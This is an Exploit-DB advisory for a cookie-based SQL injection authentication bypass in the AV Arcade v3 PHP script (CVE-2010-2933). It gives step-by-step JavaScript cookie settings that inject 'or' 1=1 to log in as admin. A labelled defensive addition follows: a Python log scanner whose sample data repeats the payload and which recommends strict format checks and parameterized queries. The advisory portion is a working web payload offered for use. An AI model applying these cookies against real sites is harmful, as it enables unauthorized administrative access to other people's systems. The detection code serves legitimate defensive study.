AV Arcade 3 - Cookie SQL Injection Authentication Bypass

2010-07-28T00:00:00
ID EDB-ID:14494
Type exploitdb
Reporter saudi0hacker
Modified 2010-07-28T00:00:00

Description

AV Arcade v3 Cookie SQL Injection Authentication Bypass. CVE-2010-2933. Webapps exploit for the PHP platform.

:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:

[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login

[2] Set these cookies:

    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"

[3] Go to the main page.

[4] Enjoy
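
A defensive check for the cookies named in this advisory, as an added example that is not part of the original advisory or AV Arcade's own code: it scans request logs for `ava_code` values that are not a bare 32-character hex digest. The log line format, the sample lines and the expected cookie formats are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate ava_code is a bare 32-character hex digest,
# like the leading part of the value shown in the advisory.
HEX32 = re.compile(r"[0-9a-fA-F]{32}")
# Assumption: usernames are short and use a conservative character set.
USERNAME = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def parse_cookie_header(header):
    """Split a Cookie header into {name: value}, percent-decoding values."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:  # skip fragments that carry no name=value pair
            cookies[name.strip()] = unquote(value.strip().strip('"'))
    return cookies

def check_ava_cookies(header):
    """Return a list of findings for the ava_* auth cookies in one header."""
    cookies = parse_cookie_header(header)
    findings = []
    code = cookies.get("ava_code")
    if code is not None and not HEX32.fullmatch(code):
        findings.append("ava_code is not a bare 32-hex digest")
    user = cookies.get("ava_username")
    if user is not None and not USERNAME.fullmatch(user):
        findings.append("ava_username has unexpected characters")
    return findings

def scan(log_lines):
    """Yield (line_number, client, findings) for suspicious requests."""
    for n, line in enumerate(log_lines, 1):
        client, _, header = line.partition(" Cookie: ")
        findings = check_ava_cookies(header)
        if findings:
            yield n, client, findings

# Constructed sample input (documentation IP ranges, not real traffic).
SAMPLE = [
    "192.0.2.10 Cookie: ava_username=alice; ava_code=0123456789abcdef0123456789abcdef",
    "198.51.100.7 Cookie: ava_username=admin; ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1",
    "198.51.100.7 Cookie: ava_username=admin; ava_code=c4ca4238a0b923820dcc509a6f75849b%20%27or%27%201%3D1",
    "203.0.113.5 Cookie: theme=dark",
]

if __name__ == "__main__":
    for n, client, findings in scan(SAMPLE):
        print(n, client, "; ".join(findings))
```

The same strict format check belongs in the application before the cookie value reaches any SQL statement, alongside parameterized queries.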